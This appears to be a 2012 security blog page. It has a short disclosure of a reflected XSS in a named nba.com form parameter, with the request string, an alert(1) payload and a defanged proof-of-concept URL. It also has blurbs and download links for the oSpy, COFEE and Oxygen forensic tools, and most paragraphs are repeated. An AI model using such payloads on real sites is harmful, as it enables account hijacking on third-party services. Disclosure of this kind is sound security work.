... neuere Einträge
Monday, 5. March 2012
nba.com - XSS
Am Monday, 5. Mar 2012 im Topic 'Vulnerabilities'
Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
oSpy- Sniffing Local Application Calls
Am Monday, 5. Mar 2012 im Topic 'Tools'
oSpy is a tool which aids in reverse-engineering software running on the Windows platform.
oSpy already intercepts one such API, and is the API used by MSN Messenger, Google Talk, etc. for encrypting/decrypting HTTPS data.
Download
http://code.google.com/p/ospy/downloads/list
oSpy already intercepts one such API, and is the API used by MSN Messenger, Google Talk, etc. for encrypting/decrypting HTTPS data.
Download
http://code.google.com/p/ospy/downloads/list
Online Forensic Evidence Extractor (COFEE)
Am Monday, 5. Mar 2012 im Topic 'Forensic'
Microsoft has created Computer Online Forensic Evidence Extractor (COFEE), designed exclusively for use by law enforcement agencies. COFEE brings together a number of common digital forensics capabilities into a fast, easy-to-use, automated tool for first responders. And COFEE is being provided—at no charge—to law enforcement around the world.
With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.
Info
http://www.microsoft.com/industry/government/solutions/cofee/default.aspx
With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.
Info
http://www.microsoft.com/industry/government/solutions/cofee/default.aspx
Oxygen Forensic Suite
Am Monday, 5. Mar 2012 im Topic 'Forensic'
Besides the general data extracted by similar products, Oxygen Forensic Suite can extract a lot of unique information
Using low-level protocols allows the program to extract: phone basic information and SIM-card data, contacts list, caller groups, speed dials, missed/outgoing/incoming calls, standard SMS/MMS/E-mail folders, custom SMS/MMS/E-mail folders, deleted SMS messages (with some restrictions) , SMS Center timestamps, calendar events schedule, tasks, text notes, photos, videos, sounds, LifeBlog data (all main phone events with their geographical coordinates), Java applications, file system from phone memory and flash card, GPRS and Wi-Fi activity, voice records and much more. The list of supported features depends on a certain phone model
Download
http://www.oxygen-forensic.com/de/download/
Using low-level protocols allows the program to extract: phone basic information and SIM-card data, contacts list, caller groups, speed dials, missed/outgoing/incoming calls, standard SMS/MMS/E-mail folders, custom SMS/MMS/E-mail folders, deleted SMS messages (with some restrictions) , SMS Center timestamps, calendar events schedule, tasks, text notes, photos, videos, sounds, LifeBlog data (all main phone events with their geographical coordinates), Java applications, file system from phone memory and flash card, GPRS and Wi-Fi activity, voice records and much more. The list of supported features depends on a certain phone model
Download
http://www.oxygen-forensic.com/de/download/
... ältere Einträge
